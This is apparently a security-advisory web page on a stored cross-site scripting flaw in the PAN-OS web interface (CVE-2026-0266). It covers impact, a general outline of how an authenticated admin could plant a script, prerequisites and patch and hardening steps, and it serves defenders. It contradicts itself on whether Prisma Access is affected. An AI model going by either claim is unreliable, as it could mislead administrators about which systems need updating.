PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in the Web Interface
MonitorCVSS 4.8CVE-2026-0266Jun 10, 2026
Palo Alto Networks
IT in OT - Palo Alto firewalls are commonly deployed at IT/OT network boundaries
Summary
A stored cross-site scripting (XSS) vulnerability in PAN-OS web interface allows an authenticated administrator to inject and store JavaScript payloads. When other administrators access the affected configuration page, the payload executes in their browser session. The vulnerability affects PAN-OS on PA-Series and VM-Series firewalls and Panorama (virtual and M-Series). Cloud NGFW and Prisma Access are not affected.
What this means
What could happen
A malicious administrator with web interface access could inject JavaScript code that executes in the browsers of other administrators, potentially stealing session tokens or triggering unauthorized firewall configuration changes. This affects only personnel with admin credentials who access the web interface.
Who's at risk
Network and security administrators at organizations running Palo Alto Networks PAN-OS firewalls (PA-Series or VM-Series) or Panorama management appliances. Cloud NGFW and Prisma Access do not require updates for this issue.
How it could be exploited
An attacker with valid administrator credentials logs into the PAN-OS web interface, injects a JavaScript payload into a configuration field or setting, and stores it. When other administrators view that page, the payload executes in their browser session, allowing the attacker to capture credentials, modify rules, or escalate privileges.
Prerequisites
- Valid administrator account on the PAN-OS web interface
- Access to the PAN-OS web management interface (typically port 443)
- Ability to view or modify configuration sections where the payload is stored (may require specific admin role)
Requires valid administrator credentialsStored payload affects other admin sessionsLow CVSS score (4.8)
Exploitability
Unlikely to be exploited — EPSS score 0.2%
Affected products (2)
2 with fix
ProductAffected VersionsFix Status
PAN-OSBelow 12.1.512.1.5+
Prisma AccessBelow 11.2.1111.2.11+
Remediation & Mitigation
0/4
Do now
0/2HARDENINGRestrict web interface access (port 443) to a management network or trusted IP ranges using firewall rules or network segmentation
HARDENINGImplement role-based access control (RBAC) to limit which administrators can modify configuration fields where XSS payloads could be stored
Schedule — requires maintenance window
0/2Patching may require device reboot — plan for process interruption
PAN-OS
HOTFIXUpdate PAN-OS to version 12.1.5 or later on all PA-Series and VM-Series firewalls
Prisma Access
HOTFIXUpdate Prisma Access to version 11.2.11 or later
CVEs (1)
↑↓ Navigate · Esc Close
API:
/api/v1/advisories/9c613f45-befd-402c-910e-29e7fc6a7b05Get OT security insights every Tuesday
Advisory breakdowns, a weekly summary, and incident analyses for the people actually defending OT environments. Free, no account required.